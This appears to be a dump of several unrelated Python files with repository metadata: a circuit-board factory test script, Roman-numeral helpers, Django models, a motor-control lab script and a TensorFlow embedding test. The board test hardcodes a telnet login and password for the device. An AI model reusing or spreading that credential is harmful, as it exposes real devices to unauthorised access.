if powerResult:
downNet = __downloadVersion()
if downNet == "OK":
return
elif downNet == "loginfail":
retry = "登录超时,请重新操作,"
if t == 2:
raise TestItemFailException(failWeight=10, message=u'串口无打印')
elif downNet == "TFTPfail":
# retry = "TFTP开启失败,请重新操作,"
# continue
raise TestItemFailException(failWeight=10, message=u'APP版本下载失败, 可能是没有打开TFTP')
else:
raise TestItemFailException(failWeight=10, message=u'BOOT下载失败,未知异常')
def myReadMac():
macoffset = 0x46
proxy = MACProxy(PARAM["defaultNetOneIp"])
try:
readMac = proxy.readEeprom(macoffset, 6)
macstrRead = ""
macstrRead += binascii.hexlify(readMac[0:1])
macstrRead += binascii.hexlify(readMac[1:2])
macstrRead += binascii.hexlify(readMac[2:3])
macstrRead += binascii.hexlify(readMac[3:4])
macstrRead += binascii.hexlify(readMac[4:5])
macstrRead += binascii.hexlify(readMac[5:6])
return macstrRead
except:
raise TestItemFailException(failWeight=10, message=u"读取mac失败,EEPROM测试失败")
finally:
proxy.close()
def myWriteMac(macstr):
macoffset = 0x46
proxy = MACProxy(PARAM["defaultNetOneIp"])
for i in range(25):
try:
print "读个看看%d" % i
proxy.initResource()
proxy.readEeprom(0x27, 12)
break
except:
time.sleep(10)
else:
proxy.close()
raise TestItemFailException(failWeight=10, message=u"建立连接失败,EEPROM测试失败")
try:
macLast = binascii.unhexlify(macstr)
proxy.writeEeprom(macoffset, macLast)
except:
raise TestItemFailException(failWeight=10, message=u"写入mac失败,EEPROM测试失败")
finally:
proxy.close()
def T_03_MACTest_A(product):
u'EEPROM测试-EEPROM读写测试'
myWriteMac("A1A1A1A1A1A1")
macstrRead2 = myReadMac()
if macstrRead2.upper() == "A1A1A1A1A1A1":
return {u"EEPROM测试":u"EEPROM读写成功"}
raise TestItemFailException(failWeight=10, message=u"写入与分配mac不一致,EEPROM测试失败")
def T_04_checkVersionTest_A(product):
u"查询版本号-查询版本号"
sc = VersionManager(PARAM["defaultNetOneIp"])
# sc = __askForCheckVersion()
try:
ret = sc.queryVersion()
except:
raise TestItemFailException(failWeight=1, message=u"版本获取失败")
finally:
sc.close()
if ret["sysRuning"] == 0:
sysVersion = ret["sys0VersionNum"]
sysStandby = ret["sys1VersionNum"]
else:
sysVersion = ret["sys1VersionNum"]
sysStandby = ret["sys0VersionNum"]
return{u"应用版本号":ret["appRuningVersionNum"],u"系统版本号":sysVersion,u"备用系统版本号":sysStandby}
def T_05_PSAMTest_A(product):
u'PSAM卡接口测试-RSDB0单板连接RSIB0单板进行4个PSAM卡接口测试'
errorList = []
# proxy = __askForRD50CNet1()
proxy = PsamProxy(PARAM["defaultNetOneIp"])
command = "00a4000002df01"
try:
for slot in range(4):
ack = proxy.active(slot)
if ack[0:4] != "e800":
superUiLog(u"PSAM卡槽[%d]激活失败"%(slot+1) + ack)
errorList.append(str(slot+1))
continue
else:
superUiLog(u"PSAM卡槽[%d]激活成功"%(slot+1) + ack[4:])
ackRead = proxy.exchangeApdu(slot, command)
if ackRead[0:4] != "e900":
uiLog(u"命令执行失败 " + ack)
else:
uiLog(u"命令执行成功 " + ack[4:])
finally:
proxy.close()
if errorList != []:
PARAM["failNum"] = "1"
raise TestItemFailException(failWeight=1, message=u'PSAM卡槽%s激活失败' % ",".join(errorList))
return
def T_06_lightTest_M(protduct):
u"面板灯接口测试-RSDB0单板连接RSIB0单板进行单板面板灯接口测试"
LightDict = {"系统PWR":"长亮","系统RUN":"闪烁","系统SAM":"长亮"}
alist = []
for alight in LightDict:
lightResult = manulCheck(u"面板灯接口测试", u"请观察%s灯是否%s"%(alight,LightDict[alight]))
if lightResult:
continue
alist.append(alight)
# proxy = __askForRD50CLight()
proxy = DeviceProxy(PARAM["defaultNetOneIp"])
try:
epld_addr = int(str("da"), 16)
epld_value = int(str("0"), 16)
proxy._write_epld(epld_addr, epld_value)
redlightResult = manulCheck(u"系统报警灯", u"请观察系统ALM灯是否闪烁,点击正常后ALM灯将会关闭")
if redlightResult:
epld_addr1 = int(str("da"), 16)
epld_value1 = int(str("1"), 16)
proxy._write_epld(epld_addr1, epld_value1)
else:
alist.append("系统ALM")
epld_addr1 = int(str("da"), 16)
epld_value1 = int(str("1"), 16)
proxy._write_epld(epld_addr1, epld_value1)
time.sleep(0.5)
epld_addr1 = int(str("17c"), 16)
epld_value1 = int(str("00"), 16)
proxy._write_epld(epld_addr1, epld_value1)
sixlightResult = manulCheck(u"led灯亮起提示", u"led灯ANT1-ANT6是否亮起,判断后会关闭led灯")
if sixlightResult:
epld_addr1 = int(str("17c"), 16)
epld_value1 = int(str("3f"), 16)
proxy._write_epld(epld_addr1, epld_value1)
else:
alist.append("ANT1-ANT6灯")
epld_addr1 = int(str("17c"), 16)
epld_value1 = int(str("3f"), 16)
proxy._write_epld(epld_addr1, epld_value1)
finally:
proxy.close()
if alist:
cir = ",".join(alist)
PARAM["failNum"] = "1"
raise TestItemFailException(failWeight=1, message=u"%s测试不正常" % cir)
return
def _T_07_PCIETest_A(product):
u"PCIE测试-PCIE测试"
proxy = PCIEProxy(PARAM["PCIEIp"])
try:
recvResult = proxy.sendPcie()
print recvResult
except:
raise TestItemFailException(failWeight=10, message=u"PCIE测试失败")
finally:
proxy.close()
def T_07_carDetection_A(protduct):
u"车检串口-车检串口"
proxy = DeviceProxy(PARAM["defaultNetOneIp"])
try:
epld_addr = int(str("d4"), 16)
epld_value = int(str("7"), 16)
proxy._write_epld(epld_addr, epld_value)
pullOutResult = manulCheck(u"提示", u"请再车检插口的工装接口插拔之后,点击确定")
if pullOutResult:
read_epld_addr = int(str("90"), 16)
readResult = proxy._read_epld(read_epld_addr)
readResult = hex(readResult)[2:]
print readResult
if readResult != "c0":
proxy.close()
PARAM["failNum"] = "1"
raise TestItemFailException(failWeight=1, message=u"车检口测试失败,错误码%s"%readResult)
epld_addr1 = int(str("d2"),16)
epld_value1 = int(str("1"),16)
epld_value2 = int(str("0"),16)
proxy._write_epld(epld_addr1, epld_value1)
time.sleep(0.5)
proxy._write_epld(epld_addr1, epld_value2)
finally:
proxy.close()
def _T_08_serialPort_A(product):
u"串口测试-串口测试"
time.sleep(10)
ip1 = PARAM["defaultNetOneIp"]
tn = telnetlib.Telnet(ip1, port=23, timeout=10)
try:
tn.set_debuglevel(2)
tn.read_until('login: ')
tn.write('rsu_c\r')
tn.read_until('Password: ')
tn.write('shhic357\r')
tn.read_until("#")
tn.write('cat /dev/ttyS1 > myd.txt & \n')
tn.read_until("#")
se = serial.Serial(PARAM["serialPort"], 115200)
for i in range(4):
se.write("%s\n"%"mynameisco"*10)
time.sleep(2)
se.close()
tn.write("wc -l myd.txt\n")
b = tn.read_until("#", 4)
l = b.split("\n")[1].strip()[0]
print l
except:
raise AbortTestException(message=u"请检查工装连接是否正常")
finally:
tn.close()
# for i in l:
# if "4 myd.txt" in i:
# return {u"串口测试": u"成功"}
if int(l) > 0:
return {u"串口测试": u"成功,%s"%l}
else:
raise TestItemFailException(failWeight=10, message=u'串口测试失败')
def T_09_RTCTest_A(product):
u"RTC时钟测试-RSDB0单板RTC时钟时间设置测试"
setList =[]
tmList = []
timeNow = time.localtime()
set_year = int(timeNow[0])
set_mon = int(timeNow[1])
set_day = int(timeNow[2])
set_wday = int(timeNow[6])
set_hour = int(timeNow[3])
set_min = int(timeNow[4])
set_sec = int(timeNow[5])
proxy = RTCProxy(PARAM["defaultNetOneIp"])
try:
proxy.rtc_init()
proxy.rtc_set(set_year,set_mon,set_day,set_wday,set_hour,set_min,set_sec)
setList.extend((set_year,set_mon,set_day,set_wday,set_hour,set_min,set_sec))
ack = proxy.rtc_read()
except:
raise TestItemFailException(failWeight=1, message=u'RTC时钟设置失败')
finally:
proxy.close()
rtc_time = binascii.hexlify(ack)
ret = int(rtc_time[0:8], 16)
tm_sec = int(rtc_time[8:16], 16)
tm_min = int(rtc_time[16:24], 16)
tm_hour = int(rtc_time[24:32], 16)
tm_mday = int(rtc_time[32:40], 16)
tm_mon = int(rtc_time[40:48], 16)
tm_year = int(rtc_time[48:56], 16)
tm_wday = int(rtc_time[56:64], 16)
tmList.extend((tm_year, tm_mon, tm_mday, tm_wday, tm_hour, tm_min, tm_sec))
print "tmList",tmList
if ret == 0:
print "get rtc time: %d-%d-%d,%d,%d:%d:%d \r\n" % (tm_year, tm_mon, tm_mday, tm_wday, tm_hour, tm_min, tm_sec)
if setList == tmList:
return
else:
PARAM["failNum"] = "1"
raise TestItemFailException(failWeight=1, message=u'RTC时钟设置失败')
def T_10_doorDogTest_A(product):
u"看门狗测试-RSDB0单板硬件看门狗测试"
ip1 = PARAM["defaultNetOneIp"]
tn = telnetlib.Telnet(ip1, port=23, timeout=10)
try:
tn.set_debuglevel(2)
# 输入登录用户名
tn.read_until('login: ')
tn.write('rsu_c\r')
# 输入登录密码
tn.read_until('Password: ')
tn.write('shhic357\r')
# 登录完毕后执行命令
tn.read_until("# ")
tn.write('ps\n')
psProcess = tn.read_until("/usr/bin/wtd")
pslist = psProcess.split("\n")
for oneProcess in pslist:
if "usr/bin/wtd" in oneProcess:
doorProcess = oneProcess.strip().split(" ")
break
else:
raise TestItemFailException(failWeight=10, message=u'没有喂狗进程')
tn.write("kill %s\n" % doorProcess[0])
time.sleep(2)
except:
raise TestItemFailException(failWeight=10, message=u'看门狗测试失败')
finally:
tn.close()
sc = __doorDog()
if sc == "ok":
return {u"看门狗测试":u"成功"}
else:
raise TestItemFailException(failWeight=10, message=u'看门狗失效')
| [
"929593844@qq.com"
] | 929593844@qq.com |
d64582191948248f5a9180c22d26c6bc08d3fe1a | cc60cd7cf8ce77e2f29f41c7778f1c4f04240287 | /cfgov/regulations3k/scripts/integer_conversion.py | 5df0b2a09734998a21be9c9515005fdeff624ade | [
"CC0-1.0"
] | permissive | atuggle/cfgov-refresh | bd0236a36ad27da37abcfe97c283a0e0f66a6645 | 5a9cfd92b460b9be7befb39f5845abf56857aeac | refs/heads/master | 2020-03-16T16:01:12.474154 | 2018-06-08T17:50:14 | 2018-06-11T16:42:56 | 132,768,327 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,738 | py | from __future__ import unicode_literals
import string
def roman_to_int(roman):
"""
Convert a unicode lowercase Roman numeral to an integer.
This is python3-compliant and assumes unicode strings. So if you test
either function in Python2 in a Django shell, be sure to import
unicode_literals or use explicit unicode strings, such as u'iii'.
"""
if not isinstance(roman, type("")):
return
nums = {'m': 1000, 'd': 500, 'c': 100, 'l': 50, 'x': 10, 'v': 5, 'i': 1}
total = 0
for i in range(len(roman)):
try:
value = nums[roman[i]]
if i + 1 < len(roman) and nums[roman[i + 1]] > value:
total -= value
else:
total += value
except KeyError:
return
if int_to_roman(total) == roman:
return total
else:
return
def int_to_roman(num):
"""Convert an integer to a lowercase Roman numeral, as used in regs."""
if not isinstance(num, type(1)):
raise TypeError("Expected integer, got {}".format(type(num)))
if num < 1 or num > 3999:
raise ValueError("Argument must be between 1 and 3999")
int_values = (1000, 900, 500, 400, 100, 90, 50, 40,
10, 9, 5, 4, 1)
numerals = ('m', 'cm', 'd', 'cd', 'c', 'xc', 'l', 'xl',
'x', 'ix', 'v', 'iv', 'i')
result = []
for i in range(len(int_values)):
count = int(num / int_values[i])
result.append(numerals[i] * count)
num -= int_values[i] * count
return ''.join(result)
def alpha_to_int(alpha):
"""
Return a letter's place in the alphabet, or None.
For double letters, return it's place in the double-letter alphabet,
which starts at 27.
"""
letters = string.ascii_lowercase
if not isinstance(alpha, type('')):
return
if not (alpha.islower() or alpha.isupper()):
"""Handle lowercase or uppercase double letters, but not a mix."""
return
alpha_map = {value: i + 1 for i, value in enumerate(letters)}
double_letters = ["{0}{0}".format(letter) for letter in letters]
double_range = list(range(27, 53))
double_map = dict(zip(double_letters, double_range))
alpha_map.update(double_map)
return alpha_map.get(alpha.lower(), None)
def int_to_alpha(num):
"""Return the lowercase letter(s) at a position in the alphabet, or None"""
letters = string.ascii_lowercase
int_map = {i + 1: value for i, value in enumerate(letters)}
double_letters = ["{0}{0}".format(letter) for letter in letters]
double_range = list(range(27, 53))
double_map = dict(zip(double_range, double_letters))
int_map.update(double_map)
return int_map.get(num, None)
| [
"noreply@github.com"
] | atuggle.noreply@github.com |
005465f20680fb4a6b902a62c9c1f39bd408de7d | 505b766aeef6dae5fdb2cab9f2550543179e10e9 | /app/keyvalue/models.py | ca70f4fd07e1a6862c13073c71802ea54c71b626 | [] | no_license | tossedwarrior/wri | 19b912630d00f64bcccc499ba22418c73c7bf359 | 0d4a0f9d7c36b04f87c7cf0ec42db4a57698137f | refs/heads/master | 2020-12-25T19:27:19.028235 | 2012-06-13T21:03:11 | 2012-06-13T21:03:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 837 | py | # -*- encoding: utf-8 -*-
import os
from datetime import datetime
if 'SERVER_SOFTWARE' in os.environ and os.environ['SERVER_SOFTWARE'].startswith('Dev'):
from django.db import models
class JSONData(models.Model):
json = models.TextField(default='[]')
@staticmethod
def get_by_id(id):
return JSONData.objects.get(pk=id)
def put(self):
self.save()
def unique_id(self):
return self.id
class Error(models.Model):
error = models.TextField(default='')
when = models.DateTimeField(default=datetime.now)
@staticmethod
def track(log):
Error(error=log).save();
@staticmethod
def latest():
return Error.objects.order_by('-when')[:10]
else:
from models_appengine import *
| [
"qualopec@gmail.com"
] | qualopec@gmail.com |
3df3cc440edbedcb09a8d9893fc736d44be48203 | c1fc5402903bdb2f94b319756538f61ee63f329a | /controlsMotorLab.py | bdb16ab3a88f5ceb583df67e03fd46b98b9bd744 | [] | no_license | itdaniher/controlsNotebook | 1951a137f0f33d43389723efb520be88f3802cbe | bfe8bf4cb43de402debf6df5d3c29491dc80727d | refs/heads/master | 2016-09-10T11:48:53.474372 | 2014-11-24T22:39:10 | 2014-11-24T22:39:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,746 | py | from __future__ import division
import connectClient
import time
from scipy.interpolate import *
from pylab import *
import numpy
cee = connectClient.CEE()
# set a sample rate of 40,000 samples per second
cee.setSampleRate(40)
# for four quadrant operation, use a "zero" point of 2v5
zero = 2.5
def getCounters():
# get four bytes from xmega onboard cee
data = cee.dev.ctrl_transfer(0x80 | 0x40, 0x10, 0, 0, 4)
# ticks are time increments of units samples
sampleCounter = data[1] << 8 | data[0]
position = data[3] << 8 | data[2]
return sampleCounter, position
def getRPS(dt = .1):
# catch overflow of 16b timer/counters by comparing two subsequent values
def catchOverflow(a_v, b_v):
if (a_v > (2**16)*(3/4)) and (b_v < (2**16)*(1/4)):
b_v += 2**16
return a_v, b_v
# getCounters
a_t, a_s = getCounters()
# wait
time.sleep(dt)
# getCounters
b_t, b_s = getCounters()
# clean
a_t, b_t = catchOverflow(a_t, b_t)
a_s, b_s = catchOverflow(a_s, b_s)
try:
assert b_s > a_s
except:
return getRPS(dt)
# normalize position data
rotations = (b_t-a_t)/1088
# normalize time data
duration = (b_s-a_s)*cee.devInfo['sampleTime']
# rps = rotations / duration
rps = rotations / duration
return rps
def getDCSample(v, dt = .1):
ss = cee.setOutputConstant('b', 'v', zero+v)['startSample']
(v, i) = cee.getInput('b', resample=dt, count=1, start = ss+int(dt/cee.devInfo['sampleTime']))
v = v - zero
dw = getRPS(dt)
return {'v':v, 'i':i, 'dw':dw}
def plotTwoAxes(x, y1, y2, xlabel="x", y1label="y1", y2label="y2"):
f = figure()
hold(True)
ax1 = f.add_subplot(111)
ax1.plot(x, y1, 'r.')
ax1.set_xlabel(xlabel)
ax1.set_ylabel(y1label, color="r")
for tl in ax1.get_yticklabels():
tl.set_color('r')
ax2 = ax1.twinx()
ax2.plot(x, y2, 'b.')
ax2.set_ylabel(y2label, color="b")
for tl in ax2.get_yticklabels():
tl.set_color('b')
return f
def DCAnalysis():
# ensure "zero" point is where we want it to be
cee.setOutputConstant('a', 'v', zero)
# set reasonable timestep for steady state analysis
dt = 0.2
# set to max negative in light of future sampling
cee.setOutputConstant('b', 'v', 0)
data = []
# go through len 50 list of voltages, get voltage, current, and rotational velocity for each voltage
for v in linspace(-zero, zero, 50):
data.append(getDCSample(v, dt))
# cleanup
v = array([d['v'] for d in data])
i = array([d['i'] for d in data])
dw = array([d['dw'] for d in data])
f = figure()
hold(True)
ax1 = f.add_subplot(111)
ax1.plot(v, dw, 'r.', label="dw/dt data (rps)")
legend(loc="best")
ax1.set_xlabel("voltage (v)")
ax1.set_ylabel("rotations per second", color="r")
for tl in ax1.get_yticklabels():
tl.set_color('r')
ax2 = ax1.twinx()
ax2.plot(v, i, 'bo', label="measured current (mA)")
ax2.set_ylabel("current draw (mA)", color="b")
for tl in ax2.get_yticklabels():
tl.set_color('b')
# resistance is a least squares fit of voltage and current
resistance = polyfit(v, i, 1)
ax2.plot(v, polyval(resistance, v), '-', label="resistance fit")
legend(loc='best')
f.savefig("DCanalysis.png")
print resistance[0], " ohms"
i = -i
# electrical constant as per the lab instructions
k_e = polyfit(v - i*resistance[0], dw, 1)[0]
print k_e, "rps per volt"
# electrical constant as per my understanding
k_e = polyfit(v, dw, 1)[0]
print k_e, "rps per volt"
legend(loc='best')
return data
def ACAnalysis():
# make sure zero is actually zero
cee.setOutputConstant('a', 'v', zero)
# total observable behavior should span 4 tau
# tau is somewhat arbitrarily chosen constant for what seemed to ecapsulate the interesting parts
tau = .25
# value of 10, in this case, 10mA
v = 10
# calculate how many samples are contained in four timesteps
sampleCt = int(4*tau/cee.devInfo['sampleTime'])
# set a step from 0mA to 10mA to happen at tau/4, measure until 4tau
# "ss" is the integer value of the starting sample
ss = cee.setOutputArbitrary('b', 'i', [0, tau/4, tau/4, 4*tau], [0, 0, +v, +v], repeat=0)['startSample']
# instantiate empty array
data = []
while True:
# inner loop, simply call getCounters, shove the data into the array, break if the sample count is more than our target end point
data.append(getCounters())
datum = data[-1]
if datum[1] > ss+sampleCt:
break
# get 'sampleCt' samples into lists "v" and "i" with no resampling, starting at the sample point the arbitrary waveform started
(v, i) = cee.getInput('b', resample=0, count=sampleCt, start=ss)
# normalize to "zero"
v = array(v) - zero
# generate array of "sampleCt" sample indexes
s = arange(ss, sampleCt+ss)
# "t" or ticks is the 2nd element in data
t = [d[1] for d in data]
# "w" or omega is the 1st element
w = [d[0] for d in data]
# plot motor voltage and current on the same plot
plotTwoAxes(s, v, i, "samples", "voltage", "current").show()
# generate an abbreviated set of times on the continuum from the first measured sample count to the last
x_f = linspace(t[0], t[-1], 100)
# fit a spline to our rotations over time data
fit = UnivariateSpline(t, w)
# show quality of fit
figure()
plot(x_f, fit(x_f), label="univariate spline fit")
xlabel("time (samples)")
ylabel("position")
title("position over time")
plot(t, w, '.', label="data")
legend(loc="best")
# use spline as low-jitter source of rotational data capable of being numerically integrated
figure()
plot(t[1::], diff(w)/diff(t), '.', label='numerically differentiated data')
plot(x_f[1::], diff(fit(x_f))/diff(x_f), '-', label='derivative of interpolated and dt-normalized w')
rpsps = diff(fit(x_f), 2)/(diff(x_f)[1::])
semilogy(x_f[2::], rpsps, '-', label='second derivative of interpolated and dt-normalized w')
xlabel("time (samples)")
ylabel("data")
legend(loc='best')
show()
| [
"it.daniher@gmail.com"
] | it.daniher@gmail.com |
ae069441f2d4ce8ad54d7f0570cef537641659eb | 5dd190725aaaeb7287d935b3c99c20480b208816 | /object_detection/dataset_tools/context_rcnn/generate_embedding_data_tf2_test.py | a93e9eacd9bc9e9e98402f6d60446363b8b6c604 | [
"MIT"
] | permissive | DemonDamon/mask-detection-based-on-tf2odapi | 32d947164fb54395b9e45368c0d4bcf3a6ea1c28 | 192ae544169c1230c21141c033800aa1bd94e9b6 | refs/heads/main | 2023-05-13T05:05:44.534885 | 2021-06-08T05:56:09 | 2021-06-08T05:56:09 | 369,463,131 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 13,488 | py | # Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for generate_embedding_data."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import os
import tempfile
import unittest
import numpy as np
import six
import tensorflow as tf
from object_detection import exporter_lib_v2
from object_detection.builders import model_builder
from object_detection.core import model
from object_detection.protos import pipeline_pb2
from object_detection.utils import tf_version
if tf_version.is_tf2():
from object_detection.dataset_tools.context_rcnn import generate_embedding_data # pylint:disable=g-import-not-at-top
if six.PY2:
import mock # pylint: disable=g-import-not-at-top
else:
mock = unittest.mock
try:
import apache_beam as beam # pylint:disable=g-import-not-at-top
except ModuleNotFoundError:
pass
class FakeModel(model.DetectionModel):
def __init__(self, conv_weight_scalar=1.0):
super(FakeModel, self).__init__(num_classes=5)
self._conv = tf.keras.layers.Conv2D(
filters=1, kernel_size=1, strides=(1, 1), padding='valid',
kernel_initializer=tf.keras.initializers.Constant(
value=conv_weight_scalar))
def preprocess(self, inputs):
return tf.identity(inputs), exporter_lib_v2.get_true_shapes(inputs)
def predict(self, preprocessed_inputs, true_image_shapes):
return {'image': self._conv(preprocessed_inputs)}
def postprocess(self, prediction_dict, true_image_shapes):
with tf.control_dependencies(prediction_dict.values()):
num_features = 100
feature_dims = 10
classifier_feature = np.ones(
(2, feature_dims, feature_dims, num_features),
dtype=np.float32).tolist()
postprocessed_tensors = {
'detection_boxes': tf.constant([[[0.0, 0.1, 0.5, 0.6],
[0.5, 0.5, 0.8, 0.8]]], tf.float32),
'detection_scores': tf.constant([[0.95, 0.6]], tf.float32),
'detection_multiclass_scores': tf.constant([[[0.1, 0.7, 0.2],
[0.3, 0.1, 0.6]]],
tf.float32),
'detection_classes': tf.constant([[0, 1]], tf.float32),
'num_detections': tf.constant([2], tf.float32),
'detection_features':
tf.constant([classifier_feature],
tf.float32)
}
return postprocessed_tensors
def restore_map(self, checkpoint_path, fine_tune_checkpoint_type):
pass
def restore_from_objects(self, fine_tune_checkpoint_type):
pass
def loss(self, prediction_dict, true_image_shapes):
pass
def regularization_losses(self):
pass
def updates(self):
pass
@contextlib.contextmanager
def InMemoryTFRecord(entries):
temp = tempfile.NamedTemporaryFile(delete=False)
filename = temp.name
try:
with tf.io.TFRecordWriter(filename) as writer:
for value in entries:
writer.write(value)
yield filename
finally:
os.unlink(temp.name)
@unittest.skipIf(tf_version.is_tf1(), 'Skipping TF2.X only test.')
class GenerateEmbeddingData(tf.test.TestCase):
def _save_checkpoint_from_mock_model(self, checkpoint_path):
"""A function to save checkpoint from a fake Detection Model.
Args:
checkpoint_path: Path to save checkpoint from Fake model.
"""
mock_model = FakeModel()
fake_image = tf.zeros(shape=[1, 10, 10, 3], dtype=tf.float32)
preprocessed_inputs, true_image_shapes = mock_model.preprocess(fake_image)
predictions = mock_model.predict(preprocessed_inputs, true_image_shapes)
mock_model.postprocess(predictions, true_image_shapes)
ckpt = tf.train.Checkpoint(model=mock_model)
exported_checkpoint_manager = tf.train.CheckpointManager(
ckpt, checkpoint_path, max_to_keep=1)
exported_checkpoint_manager.save(checkpoint_number=0)
def _export_saved_model(self):
tmp_dir = self.get_temp_dir()
self._save_checkpoint_from_mock_model(tmp_dir)
output_directory = os.path.join(tmp_dir, 'output')
saved_model_path = os.path.join(output_directory, 'saved_model')
tf.io.gfile.makedirs(output_directory)
with mock.patch.object(
model_builder, 'build', autospec=True) as mock_builder:
mock_builder.return_value = FakeModel()
exporter_lib_v2.INPUT_BUILDER_UTIL_MAP['model_build'] = mock_builder
output_directory = os.path.join(tmp_dir, 'output')
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
exporter_lib_v2.export_inference_graph(
input_type='tf_example',
pipeline_config=pipeline_config,
trained_checkpoint_dir=tmp_dir,
output_directory=output_directory)
saved_model_path = os.path.join(output_directory, 'saved_model')
return saved_model_path
def _create_tf_example(self):
encoded_image = tf.io.encode_jpeg(
tf.constant(np.ones((4, 4, 3)).astype(np.uint8))).numpy()
def BytesFeature(value):
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def Int64Feature(value):
return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
def FloatFeature(value):
return tf.train.Feature(float_list=tf.train.FloatList(value=[value]))
example = tf.train.Example(
features=tf.train.Features(
feature={
'image/encoded': BytesFeature(encoded_image),
'image/source_id': BytesFeature(b'image_id'),
'image/height': Int64Feature(400),
'image/width': Int64Feature(600),
'image/class/label': Int64Feature(5),
'image/class/text': BytesFeature(b'hyena'),
'image/object/bbox/xmin': FloatFeature(0.1),
'image/object/bbox/xmax': FloatFeature(0.6),
'image/object/bbox/ymin': FloatFeature(0.0),
'image/object/bbox/ymax': FloatFeature(0.5),
'image/object/class/score': FloatFeature(0.95),
'image/object/class/label': Int64Feature(5),
'image/object/class/text': BytesFeature(b'hyena'),
'image/date_captured': BytesFeature(b'2019-10-20 12:12:12')
}))
return example.SerializeToString()
def assert_expected_example(self, example, topk=False, botk=False):
# Check embeddings
if topk or botk:
self.assertEqual(len(
example.features.feature['image/embedding'].float_list.value),
218)
self.assertAllEqual(
example.features.feature['image/embedding_count'].int64_list.value,
[2])
else:
self.assertEqual(len(
example.features.feature['image/embedding'].float_list.value),
109)
self.assertAllEqual(
example.features.feature['image/embedding_count'].int64_list.value,
[1])
self.assertAllEqual(
example.features.feature['image/embedding_length'].int64_list.value,
[109])
# Check annotations
self.assertAllClose(
example.features.feature['image/object/bbox/ymin'].float_list.value,
[0.0])
self.assertAllClose(
example.features.feature['image/object/bbox/xmin'].float_list.value,
[0.1])
self.assertAllClose(
example.features.feature['image/object/bbox/ymax'].float_list.value,
[0.5])
self.assertAllClose(
example.features.feature['image/object/bbox/xmax'].float_list.value,
[0.6])
self.assertAllClose(
example.features.feature['image/object/class/score']
.float_list.value, [0.95])
self.assertAllClose(
example.features.feature['image/object/class/label']
.int64_list.value, [5])
self.assertAllEqual(
example.features.feature['image/object/class/text']
.bytes_list.value, [b'hyena'])
self.assertAllClose(
example.features.feature['image/class/label']
.int64_list.value, [5])
self.assertAllEqual(
example.features.feature['image/class/text']
.bytes_list.value, [b'hyena'])
# Check other essential attributes.
self.assertAllEqual(
example.features.feature['image/height'].int64_list.value, [400])
self.assertAllEqual(
example.features.feature['image/width'].int64_list.value, [600])
self.assertAllEqual(
example.features.feature['image/source_id'].bytes_list.value,
[b'image_id'])
self.assertTrue(
example.features.feature['image/encoded'].bytes_list.value)
def test_generate_embedding_data_fn(self):
saved_model_path = self._export_saved_model()
top_k_embedding_count = 1
bottom_k_embedding_count = 0
inference_fn = generate_embedding_data.GenerateEmbeddingDataFn(
saved_model_path, top_k_embedding_count, bottom_k_embedding_count)
inference_fn.setup()
generated_example = self._create_tf_example()
self.assertAllEqual(tf.train.Example.FromString(
generated_example).features.feature['image/object/class/label']
.int64_list.value, [5])
self.assertAllEqual(tf.train.Example.FromString(
generated_example).features.feature['image/object/class/text']
.bytes_list.value, [b'hyena'])
output = inference_fn.process(('dummy_key', generated_example))
output_example = output[0][1]
self.assert_expected_example(output_example)
def test_generate_embedding_data_with_top_k_boxes(self):
saved_model_path = self._export_saved_model()
top_k_embedding_count = 2
bottom_k_embedding_count = 0
inference_fn = generate_embedding_data.GenerateEmbeddingDataFn(
saved_model_path, top_k_embedding_count, bottom_k_embedding_count)
inference_fn.setup()
generated_example = self._create_tf_example()
self.assertAllEqual(
tf.train.Example.FromString(generated_example).features
.feature['image/object/class/label'].int64_list.value, [5])
self.assertAllEqual(
tf.train.Example.FromString(generated_example).features
.feature['image/object/class/text'].bytes_list.value, [b'hyena'])
output = inference_fn.process(('dummy_key', generated_example))
output_example = output[0][1]
self.assert_expected_example(output_example, topk=True)
def test_generate_embedding_data_with_bottom_k_boxes(self):
saved_model_path = self._export_saved_model()
top_k_embedding_count = 0
bottom_k_embedding_count = 2
inference_fn = generate_embedding_data.GenerateEmbeddingDataFn(
saved_model_path, top_k_embedding_count, bottom_k_embedding_count)
inference_fn.setup()
generated_example = self._create_tf_example()
self.assertAllEqual(
tf.train.Example.FromString(generated_example).features
.feature['image/object/class/label'].int64_list.value, [5])
self.assertAllEqual(
tf.train.Example.FromString(generated_example).features
.feature['image/object/class/text'].bytes_list.value, [b'hyena'])
output = inference_fn.process(('dummy_key', generated_example))
output_example = output[0][1]
self.assert_expected_example(output_example, botk=True)
def test_beam_pipeline(self):
with InMemoryTFRecord([self._create_tf_example()]) as input_tfrecord:
temp_dir = tempfile.mkdtemp(dir=os.environ.get('TEST_TMPDIR'))
output_tfrecord = os.path.join(temp_dir, 'output_tfrecord')
saved_model_path = self._export_saved_model()
top_k_embedding_count = 1
bottom_k_embedding_count = 0
num_shards = 1
embedding_type = 'final_box_features'
pipeline_options = beam.options.pipeline_options.PipelineOptions(
runner='DirectRunner')
p = beam.Pipeline(options=pipeline_options)
generate_embedding_data.construct_pipeline(
p, input_tfrecord, output_tfrecord, saved_model_path,
top_k_embedding_count, bottom_k_embedding_count, num_shards,
embedding_type)
p.run()
filenames = tf.io.gfile.glob(
output_tfrecord + '-?????-of-?????')
actual_output = []
record_iterator = tf.data.TFRecordDataset(
tf.convert_to_tensor(filenames)).as_numpy_iterator()
for record in record_iterator:
actual_output.append(record)
self.assertEqual(len(actual_output), 1)
self.assert_expected_example(tf.train.Example.FromString(
actual_output[0]))
if __name__ == '__main__':
tf.test.main()
| [
"noreply@github.com"
] | DemonDamon.noreply@github.com |
